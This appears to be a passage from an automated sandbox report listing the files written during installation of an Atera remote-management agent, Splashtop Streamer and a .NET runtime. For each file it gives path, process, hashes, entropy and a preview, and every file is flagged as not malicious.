                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:24:nIGWnSIGWnSGc9VIyy0KuiUQ+7n0TCDZJCCAyuIqwmCFUZnPQ1LSdT:nIL7LJSRQ+QgAyuxwfynPQmR
                                                                                                                                                                                                                                                                                                                                  MD5:78F2FCAA601F2FB4EBC937BA532E7549
                                                                                                                                                                                                                                                                                                                                  SHA1:DDFB16CD4931C973A2037D3FC83A4D7D775D05E4
                                                                                                                                                                                                                                                                                                                                  SHA-256:552F7BDCF1A7AF9E6CE672017F4F12ABF77240C78E761AC203D1D9D20AC89988
                                                                                                                                                                                                                                                                                                                                  SHA-512:BCAD73A7A5AFB7120549DD54BA1F15C551AE24C7181F008392065D1ED006E6FA4FA5A60538D52461B15A12F5292049E929CFFDE15CC400DEC9CDFCA0B36A68DD
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:0...0..x..........W..!2.9...wu\0...*.H........0b1.0...U....US1.0...U....DigiCert Inc1.0...U....www.digicert.com1!0...U....DigiCert Trusted Root G40...130801120000Z..380115120000Z0b1.0...U....US1.0...U....DigiCert Inc1.0...U....www.digicert.com1!0...U....DigiCert Trusted Root G40.."0...*.H.............0..........sh..]J<0"0i3..%..!=..Y..).=X.v..{....0....8..V.m...y....._..<R.R....~...W.YUr.h.p..u.js2...D.......t;mq.-... .. .c)-..^N..!a.4...^.[......4@_.zf.w.H.fWW.TX..+.O.0.V..{]..O^.5.1..^......@.y.x...j.8.....7...}...>..p.U.A2...s*n..|!L....u]xf.:1D.3@...ZI...g.'..O9..X..$\F.d..i.v.v=Y]Bv...izH....f.t..K...c....:.=...E%...D.+~....am.3...K...}....!........p,A`..c.D..vb~.....d.3....C....w.....!..T)%.l..RQGt.&..Au.z._.?..A..[..P.1..r."..|Lu?c.!_. Qko....O..E_. ........~.&...i/..-............B0@0...U.......0....0...U...........0...U..........q]dL..g?....O0...*.H..............a.}.l.........dh.V.w.p...J...x\.._...)V.6I]Dc...f.#.=y.mk.T..<.C@..P.R..;...ik.

                                                                                                                                                                                                                                                                                                                                  C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                                  Category:modified
                                                                                                                                                                                                                                                                                                                                  Size (bytes):338
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.4344504839412293
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:6:kK2LW8AdBb3sJFN+SkQlPlEGYRMY9z+s3Ql2DUevat:Ljb3HkPlE99SCQl2DUevat
                                                                                                                                                                                                                                                                                                                                  MD5:B73A88184C9EE403D8A1FCB35DEFA4FA
                                                                                                                                                                                                                                                                                                                                  SHA1:ED034C9138558EA310A3169D9D736B1CFAA31F61
                                                                                                                                                                                                                                                                                                                                  SHA-256:B52FE4F7D4950D63F4C31E608C3EC2458F3A5153C050683C45599A4C8A672812
                                                                                                                                                                                                                                                                                                                                  SHA-512:4A518B4BB0F92218E269C39075E60C0C3C4E128C3589E3437DA529DC1A6D29E5CC57C28A87B889D8A3E0AB65E8DC0DB06B1D4AAA2AFA7DA7FB9B5F22ADC38839
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:p...... .........n.[....(................................................U.d.+.. .........p.........$...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.d.i.s.a.l.l.o.w.e.d.c.e.r.t.s.t.l...c.a.b...".7.4.6.7.8.7.a.3.f.0.d.9.1.:.0."...

                                                                                                                                                                                                                                                                                                                                  C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\698460A0B6E60F2F602361424D832905_8BB23D43DE574E82F2BEE0DF0EC47EEB

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):400
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.018003348401965
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:6:kKW4OJUr3CJXlRNfOAUMivhClroFzCJCgO3lwuqDnlyQ4hY5isIlQhZgJn:mmxMiv8sFzD3quqDkPh8Y2ZM
                                                                                                                                                                                                                                                                                                                                  MD5:3E69D354A4F5CE8A64FE5576177B4C52
                                                                                                                                                                                                                                                                                                                                  SHA1:08DEFD0D6A6CE5982A182CC983F09434BEC028B8
                                                                                                                                                                                                                                                                                                                                  SHA-256:A4BC3BAD2CDCD35D1E7A7BD83748888301604F3832F21CDF62223A5E7D5AA363
                                                                                                                                                                                                                                                                                                                                  SHA-512:B7C657527D4BD4B8DB6F0D281C4D16605F4C1A6654D7FF86ED12EDCD1F9415B21DC2EBC44F20A8329E5C89E5DECBF56930F3E1EB6A31E0F404F69D7681002AE9
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:p...... ...........W.+..(................j..#*......./......................./.. ........#..+.. ...................h.t.t.p.:././.o.c.s.p...d.i.g.i.c.e.r.t...c.o.m./.M.F.E.w.T.z.B.N.M.E.s.w.S.T.A.J.B.g.U.r.D.g.M.C.G.g.U.A.B.B.T.3.x.L.4.L.Q.L.X.D.R.D.M.9.P.6.6.5.T.W.4.4.2.v.r.s.U.Q.Q.U.R.e.u.i.r.%.2.F.S.S.y.4.I.x.L.V.G.L.p.6.c.h.n.f.N.t.y.A.8.C.E.A.6.b.G.I.7.5.0.C.3.n.7.9.t.Q.4.g.h.A.G.F.o.%.3.D...

                                                                                                                                                                                                                                                                                                                                  C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8EC9B1D0ABBD7F98B401D425828828CE_DEB07B5578A606ED6489DDA2E357A944

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):404
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.9402219756621353
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:6:kK3BHmXtvyiKfOAUMivhClroFHXHDZA6liyZlSlMul0bg3PWovy28lhl+KscSikl:pHm+mxMiv8sF3HtllJZIvOP205scn8
                                                                                                                                                                                                                                                                                                                                  MD5:BB5F6164A7C3CE96DAC70297DFD90342
                                                                                                                                                                                                                                                                                                                                  SHA1:4DC0F7C25A585C3D721CE5BCC0538CDD1B18F4B2
                                                                                                                                                                                                                                                                                                                                  SHA-256:D2B00966130AEA227FE7851635DBCA9F24B732C67A88A382C9C0FE4680700576
                                                                                                                                                                                                                                                                                                                                  SHA-512:C0720C0FC4E58E0E5EF2E430CE0B5196ED14041FD6D65035D6A0D89A6572E597289D0638FC53783113D3B4CA963AD966120DF6401CCE07762794FD890E963E2A
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:p...... .... ....... +..(.................B=.+....a..0....................a..0.. ........b]..+.. ...................h.t.t.p.:././.o.c.s.p...d.i.g.i.c.e.r.t...c.o.m./.M.F.E.w.T.z.B.N.M.E.s.w.S.T.A.J.B.g.U.r.D.g.M.C.G.g.U.A.B.B.S.R.X.e.r.F.0.e.F.e.S.W.R.r.i.p.T.g.T.k.c.J.W.M.m.7.i.Q.Q.U.a.D.f.g.6.7.Y.7.%.2.B.F.8.R.h.v.v.%.2.B.Y.X.s.I.i.G.X.0.T.k.I.C.E.A.o.o.S.Z.l.4.5.Y.m.N.9.A.o.j.j.r.i.l.U.u.g.%.3.D...

                                                                                                                                                                                                                                                                                                                                  C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\C56C4404C4DEF0DC88E5FCD9F09CB2F1

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):308
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.2131444407465524
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:6:kKwRAzNcalgRAOAUSW0P3PeXJUwh8lmi3Y:4RLtWOxSW0P3PeXJUZY
                                                                                                                                                                                                                                                                                                                                  MD5:983D7B11EAB3CB07494BC59FFB9DD142
                                                                                                                                                                                                                                                                                                                                  SHA1:FA88EF0E51F0BCE24EA8EDEF118C88DF109DDFE0
                                                                                                                                                                                                                                                                                                                                  SHA-256:C8F986E3938123DD8633BE9383221C37564A81707A91B561208BC82756A10862
                                                                                                                                                                                                                                                                                                                                  SHA-512:15DBEAC7D50E6531BA7FCE84724A77F57831DBD2A60865DC242837915D5C5EEFCE4672ACE19DC08AE66678F10A03D9D73595DF2DA61D3CDC851827D1972F79D5
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:p...... ........{X.5 +..(....................................................... ........}.-@@......................h.t.t.p.:././.c.a.c.e.r.t.s...d.i.g.i.c.e.r.t...c.o.m./.D.i.g.i.C.e.r.t.T.r.u.s.t.e.d.G.4.C.o.d.e.S.i.g.n.i.n.g.R.S.A.4.0.9.6.S.H.A.3.8.4.2.0.2.1.C.A.1...c.r.t...".6.0.9.0.3.0.2.2.-.6.b.4."...

                                                                                                                                                                                                                                                                                                                                  C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\C8E534EE129F27D55460CE17FD628216_1130D9B25898B0DB0D4F04DC5B93F141

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):412
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.995957841613266
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:6:kKvmjleaRIKQaaeKfOAUMivhClroFfJSUm2SQwItJqB3UgPSgakZdPolRMnOlAkr:3+l3kmxMiv8sFBSfamB3rbFURMOlAkr
                                                                                                                                                                                                                                                                                                                                  MD5:4DFF2D8553159C9EBCF36F32C9130BD4
                                                                                                                                                                                                                                                                                                                                  SHA1:25A9AF65D713C0053D86B6E5C19340EAC11994DA
                                                                                                                                                                                                                                                                                                                                  SHA-256:F91C80983C4E794CD013F06CBD8AC33FB01D4F909C19BDBEC0A8162806935AB7
                                                                                                                                                                                                                                                                                                                                  SHA-512:5306DDBA3A897B3CB554D8FF24703DEC68FF36654945FD1D540E794044ADA170C798B0CFD035BE04A44A8797903B2825E33717E89E1AB0E25094838C90CAB811
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:p...... ....(....;.i.+..(..................F2*.....n./.....................n./.. ............+.. ...................h.t.t.p.:././.o.c.s.p...d.i.g.i.c.e.r.t...c.o.m./.M.F.E.w.T.z.B.N.M.E.s.w.S.T.A.J.B.g.U.r.D.g.M.C.G.g.U.A.B.B.T.f.I.s.%.2.B.L.j.D.t.G.w.Q.0.9.X.E.B.1.Y.e.q.%.2.B.t.X.%.2.B.B.g.Q.Q.U.7.N.f.j.g.t.J.x.X.W.R.M.3.y.5.n.P.%.2.B.e.6.m.K.4.c.D.0.8.C.E.A.i.t.Q.L.J.g.0.p.x.M.n.1.7.N.q.b.2.T.r.t.k.%.3.D...

                                                                                                                                                                                                                                                                                                                                  C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F2E248BEDDBB2D85122423C41028BFD4

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):254
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.022939652504942
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:6:kK0LDcJgjcalgRAOAUSW0PTKDXMOXISKlUp:cLYS4tWOxSW0PAMsZp
                                                                                                                                                                                                                                                                                                                                  MD5:2E88D51517A52B994A5A8979C0E12208
                                                                                                                                                                                                                                                                                                                                  SHA1:29878B8520651FA991C72D4D0A5E6B20BBF683EE
                                                                                                                                                                                                                                                                                                                                  SHA-256:B860920133997E51D23276C03C77690136B9DB0F9BD8A08CE0E025CA11B1F816
                                                                                                                                                                                                                                                                                                                                  SHA-512:81E8B3EC8C894D0C2BE615B10B464973AC786100F1890B9320A57BD0538AA050C593F94F6011C07C9454DF1F8DC480DA0C7C34C2C69D5D7FCB08C7BFE5C4E162
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:p...... ....l..../.e +..(....................................................... ............n......................h.t.t.p.:././.c.a.c.e.r.t.s...d.i.g.i.c.e.r.t...c.o.m./.D.i.g.i.C.e.r.t.T.r.u.s.t.e.d.R.o.o.t.G.4...c.r.t...".5.a.2.8.6.4.1.7.-.5.9.4."...

                                                                                                                                                                                                                                                                                                                                  C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\AgentPackageAgentInformation.exe.log

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe
                                                                                                                                                                                                                                                                                                                                  File Type:CSV text
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):1944
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.343420056309075
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:48:MxHKQg8mHDp684YHKGSI6oPtHTHhAHKKkhHNpaHKlT44HKmHKe60:iqzCYqGSI6oPtzHeqKkhtpaqZ44qmq10
                                                                                                                                                                                                                                                                                                                                  MD5:437E4DCFC04CB727093C5232EA15F856
                                                                                                                                                                                                                                                                                                                                  SHA1:81B949390201F3B70AE2375518A0FFD329310837
                                                                                                                                                                                                                                                                                                                                  SHA-256:5EADB9774A50B6AD20D588FDA58F5A42B2E257A0AA26832B41F8EA008C1EB96B
                                                                                                                                                                                                                                                                                                                                  SHA-512:0332C7E5205CF9221172473A841284487ACC111780A58557231FCDE72A5EDB7E7E3EF6C87AB9682A688BC24992A74027F930267B541039BD8757EEF4E2F51A0E
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.ServiceProcess, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Serv759bfb78#\e2ca4e2ddffdc0d0bda3f2ca65249790\System.ServiceProcess.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.

                                                                                                                                                                                                                                                                                                                                  C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\AgentPackageSTRemote.exe.log

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe
                                                                                                                                                                                                                                                                                                                                  File Type:CSV text
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):1499
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.341844552740347
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNWE4KXSE4KlOU4mXE4Ke60:MxHKQwYHKGSI6oPtHTHhAHKKkWHKCHKl
                                                                                                                                                                                                                                                                                                                                  MD5:D45F0B0387AA9450CC88125F2428C26D
                                                                                                                                                                                                                                                                                                                                  SHA1:8C77259A299BF2FB7A66EC695A3F0EFA5154DCB6
                                                                                                                                                                                                                                                                                                                                  SHA-256:6A6DF19288C76B1CEDD0F507F226705CDE6A69F3AB59B4FC13AF5C7B7F7D12A3
                                                                                                                                                                                                                                                                                                                                  SHA-512:5523AD8087ECE039FFFEF746F9B6175D6C2F2523C372FC813D21E695C18D986432D2B83C23D0E6CD6C42C97DFC8DECE3121BE8907D05337EA9B282D3E947EF4F
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..3,"System.Numerics, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Numerics\ce

                                                                                                                                                                                                                                                                                                                                  C:\Windows\System32\spp\store\2.0\cache\cache.dat

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\sppsvc.exe
                                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):899968
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.8647754636011666
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:12288:k6kfJdDopPTX8NSBt/5ps9oJfBDGVMlDr:6PDKO6Vf
                                                                                                                                                                                                                                                                                                                                  MD5:8F723330DE8B01616AD3989E43D9C2B5
                                                                                                                                                                                                                                                                                                                                  SHA1:5F3D5A2CD7198979D55566B77FF35B0B14F3C55B
                                                                                                                                                                                                                                                                                                                                  SHA-256:8848B439CFE32CE36D86AC14C51E0452B7A0C3F5CFFB7D9223977C81056F27E0
                                                                                                                                                                                                                                                                                                                                  SHA-512:810386B4D0255DF15DDDE15B187FC3AAAEA658C39AB1606157C6ED35693957CCA72BA0881B3D5B57A7F3E9A607CD14312C2EE55482400798C5FA68E5958A7810
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:..E(....................;._....................................$.$.G.l.o.b.a.l.$.$......qQA.....................\.....Z...0...+.0.J.f.p.q.U.8.x.J.e.Y.n.Z.J.W.G.k.L.b.7.o./.C.D.+.A.J.9.U.P.y.A.e.m.R.4.2.m.F.n.1.s.=...........E(......................j.......................zz....Z...0...+.0.L.4.a.O.e.b.x.N.j.h.h.b.5./.j.Q.W.B.P.U.I.O.5.Q.G.B.B.9.J.u.j.a.g.w.S.n.E.d.W.Z.s.=...........E(......................j.....................ik......Z...0...+.1.l.x.y.b.W.0.n.C.1.7.B.p.R.q.E.2.z.U.j.G.p.P.v.E.Y.Q.R.z.e.9.5.u.c.2.b.5.G.K.l.3.I.=...........E(......................j............................Z...0...+.2.B.h.X.a.y.c.E.g.l.r.M.p.p.w.N.v.M.w.9.K.t.G.Z.2.V.g.f.0.p.I.a.3.a.F.3.g.8.S.F.f.Q.=...........E(......................j......................m=.....Z.......+.2.V.t.Q.r.6.7.8.r.5.F.P.8.8.T.K./.o.k.I.m.o.3.e.s.+.d.C.Q.b.3.K.p.r.p.A.Q.d.Q.x.V.c.=..........R2H....................Uz(.................................J...7.8.c.6.8.b.4.a.-.0.1.a.b.-.4.b.b.7.-.9.b.0.b.-.2.c.d.a.a.4.f.a.b.0.7.e.

                                                                                                                                                                                                                                                                                                                                  C:\Windows\Temp\AteraSetupLog.txt

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):4178
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.673120457455947
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:96:Y++MlXOOwLfnetJf81c31crfXe/e8tJr5VA:7+OwLt07mWE
                                                                                                                                                                                                                                                                                                                                  MD5:B0347C322468EC5ED498B8CB59C4FDA0
                                                                                                                                                                                                                                                                                                                                  SHA1:1D90136572F14039F634F186E52ED3046335B96B
                                                                                                                                                                                                                                                                                                                                  SHA-256:093EB9B9BCB9220A91F78EA5B8AE885FB933985A2A723FB905F22D229816520E
                                                                                                                                                                                                                                                                                                                                  SHA-512:BBCA596996B015B56F07FBCB755596DA9CE8448491C82308DAB1522EEB2664E7CA9083FDA2E9CFEEB30273AF379A8D6D6A2EEB039355DD941D2D7464544E452D
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:..=.=.=. .V.e.r.b.o.s.e. .l.o.g.g.i.n.g. .s.t.a.r.t.e.d.:. .3.0./.1.0./.2.0.2.4. . .1.8.:.3.1.:.2.1. . .B.u.i.l.d. .t.y.p.e.:. .S.H.I.P. .U.N.I.C.O.D.E. .5...0.0...1.0.0.1.1...0.0. . .C.a.l.l.i.n.g. .p.r.o.c.e.s.s.:. .C.:.\.W.i.n.d.o.w.s.\.S.Y.S.T.E.M.3.2.\.m.s.i.e.x.e.c...e.x.e. .=.=.=.....M.S.I. .(.c.). .(.2.4.:.3.C.). .[.1.8.:.3.1.:.2.1.:.6.4.4.].:. .R.e.s.e.t.t.i.n.g. .c.a.c.h.e.d. .p.o.l.i.c.y. .v.a.l.u.e.s.....M.S.I. .(.c.). .(.2.4.:.3.C.). .[.1.8.:.3.1.:.2.1.:.6.4.4.].:. .M.a.c.h.i.n.e. .p.o.l.i.c.y. .v.a.l.u.e. .'.D.e.b.u.g.'. .i.s. .0.....M.S.I. .(.c.). .(.2.4.:.3.C.). .[.1.8.:.3.1.:.2.1.:.6.4.4.].:. .*.*.*.*.*.*.*. .R.u.n.E.n.g.i.n.e.:..... . . . . . . . . . . .*.*.*.*.*.*.*. .P.r.o.d.u.c.t.:. .C.:.\.W.i.n.d.o.w.s.\.T.E.M.P.\.a.t.e.r.a.A.g.e.n.t.S.e.t.u.p.6.4._.1._.8._.7._.2...m.s.i..... . . . . . . . . . . .*.*.*.*.*.*.*. .A.c.t.i.o.n.:. ..... . . . . . . . . . . .*.*.*.*.*.*.*. .C.o.m.m.a.n.d.L.i.n.e.:. .*.*.*.*.*.*.*.*.*.*.....M.S.I. .(.c.). .(.2.4.:.3.C.). .[.1.8.:.3.1.:.

                                                                                                                                                                                                                                                                                                                                  C:\Windows\Temp\B7C5EA94-B96A-41F5-BE95-25D78B486678-18-31-55.dat

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):602
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.7274072014300925
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:12:H4/x2yiSWatbO152ygUcB8uBDi9s/zQl6MRdRH2nZyNuKW2p:H4ZHtgSUeEs/ccCdRHMZy5B
                                                                                                                                                                                                                                                                                                                                  MD5:FFB4D12FE875342D45A64202C4142D4D
                                                                                                                                                                                                                                                                                                                                  SHA1:AF6B7F366F83EC349C6BF02836FE731844BBA2A5
                                                                                                                                                                                                                                                                                                                                  SHA-256:4D1ACFD3637636801E069991A60D76FB3DA7D748DB3350D076DC5B167733E3A1
                                                                                                                                                                                                                                                                                                                                  SHA-512:974C2686B027E269B82851BA95DC846D00D016DB4E275730F874CFC5EC5D8E426E7C077F74D080430CC114A0E29AF569EBDA263BE4325A7BA29BFD1867DDBE2C
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:[Installation]..INSTALLDIR=C:\Program Files (x86)\Splashtop\Splashtop Remote\..SUPPORTDIR=C:\Windows\TEMP\{82794CC3-3F11-42A7-B032-B323712514EA}\..ProductName=Splashtop Streamer..ProductVersion=3.7.2.0..ProductCode={B7C5EA94-B96A-41F5-BE95-25D78B486678}..UpgradeCode={001F085C-058A-480B-AD56-2940B857C38D}..SRVMODE=0..EXTPATH=C:\Windows\TEMP\unpack\..ISUPGRADE=0..ONEUSERMODE=-1..AUTOUPGRADE=0..VTHIDSKIPOEM=1..SSUDONE=0..INSTVD=1..INSTDRV=0x81..VersionNT=603..STARTSRV=1..SRVFOLDER=Server..WOW64=1..WORKSTATION=1..TEMPFOLDER=C:\Windows\TEMP\..USERINFO=sec_opt=0,confirm_d=0,hidewindow=1..BASEDTYPE=1..

                                                                                                                                                                                                                                                                                                                                  C:\Windows\Temp\Microsoft_.NET_Runtime_-_6.0.35_(x64)_20241030183126_000_dotnet_runtime_6.0.35_win_x64.msi.log

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:Unicode text, UTF-16, little-endian text, with very long lines (319), with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):565996
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.8492688597793205
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3072:iYSMKojqR3hE1l1YyB8IVhY4X+W7nGPdxUjRWpUZo8E6U2crUlnEGoMUmPIX8Rvl:nj04n
